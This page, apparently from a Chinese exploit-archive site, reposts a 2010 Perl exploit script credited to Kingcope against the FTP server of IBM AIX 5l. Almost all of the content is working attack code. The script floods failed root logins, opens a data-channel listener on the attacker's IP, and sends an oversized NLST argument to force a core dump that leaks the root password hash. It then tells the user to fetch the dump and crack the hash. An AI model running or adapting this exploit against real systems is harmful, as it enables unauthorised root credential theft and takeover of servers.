首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AIX5l with FTP-Server Remote Root Hash Disclosure Exploit
来源:vfocus.net 作者:Kingcope 发布时间:2010-07-19  

### AIXCOREDUMP.PL ---
### --== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--
### CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd
### THE RESULT FILE IS SCRAMBLED - SEEK FOR DES LOOKING CRYPTO KEYS
### SUCCESSFULLY TESTED ON IBM AIX 5.1
### DISCOVERED & EXPLOITED BY KINGCOPE
### JULY 2010

use IO::Socket;

$|=1;

print "--== ~ AIX5l w/ FTP-SERVER REMOTE ROOT HASH DISCLOSURE EXPLOIT ~ =--\n";
print "CREATES COREDUMP INCLUDING THE ROOT USER HASH FROM /etc/security/passwd\n";
print "BY KINGCOPE\n";
print "JULY 2010\n\n";

if ($#ARGV < 1) {
 print "USAGE: ./AIXCOREDUMP.PL <target address> <your ip> [username] [password]\n";
 print "SAMPLES:\n";
 print "YOU HAVE A LOGIN ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25 kcope passwd\n";
 print "USE GUEST ACCOUNT - NEEDS WRITE ACCESS IN /PUB ./AIXCOREDUMP.PL 192.168.1.150 192.168.1.25\n";
 exit;
}

$trgt = $ARGV[0];

$sock = IO::Socket::INET->new(PeerAddr => $trgt,
                              PeerPort => '21',
                              Proto    => 'tcp');
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;                              

if ($ARGV[2] eq "") {
 $user = "ftp"; 
 $pass = "c0deb4b3\@roothash.com";
} else {
 $user = $ARGV[2];
 $passwd = $ARGV[3]; 
}
                       
$x = <$sock>;
print "*AIX EXPLOIT* REMOTE FTPD: $x\n";
if (fork()) {
for ($k=0;$k<3;$k++) {
print "*AIX EXPLOIT* POLLUTING FTPD***\n";
print "\t$x";
print $sock "USER root\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS sexy\r\n";
$x = <$sock>;
print "\t$x";
}

print "*AIX EXPLOIT* ACCESSING FOLDER***\n";
print $sock "USER $user\r\n";
$x = <$sock>;
print "\t$x";
print $sock "PASS $passwd\r\n";
$x = <$sock>;
print "\t$x";

if ($ARGV[2] eq "") {
print "*AIX EXPLOIT* CWD TO PUB***\n";
print $sock "CWD pub\r\n";
$x = <$sock>;
print "\t$x";
}

print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = <$sock>;
print "\t$x";

print "*AIX EXPLOIT* TRIGGERING COREDUMP***\n";
print $sock "NLST ~" . "A" x 5000 . "\r\n";
$x = <$sock>;

while(<$sock>) {
 print;
}

print "*AIX EXPLOIT* (SUCCESS)***\n*AIX EXPLOIT* NOW RETRIEVE THE core FILE WITH YOUR FAVOURITE CLIENT AND LOOKUP THE R00T HASH++CRACKIT!***\n";
exit;
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);  
}
## CHEERIO!
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Really Simple IM 1.3beta DoS P
·rpc.pcnfsd Remote Format Strin
·Hero DVD Buffer Overflow Explo
·GhostScript PostScript File St
·IE 7.0 - DoS Microsoft Clip Or
·Microsoft Windows Automatic LN
·Unreal Tournament 3 2.1 'STEAM
·Easy FTP Server v1.7.0.11 CWD
·SapGUI BI v7100.1.400.8 Heap C
·Easy FTP Server v1.7.0.11 LIST
·libpng <= 1.4.2 Denial of Serv
·Easy FTP Server v1.7.0.11 MKD
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved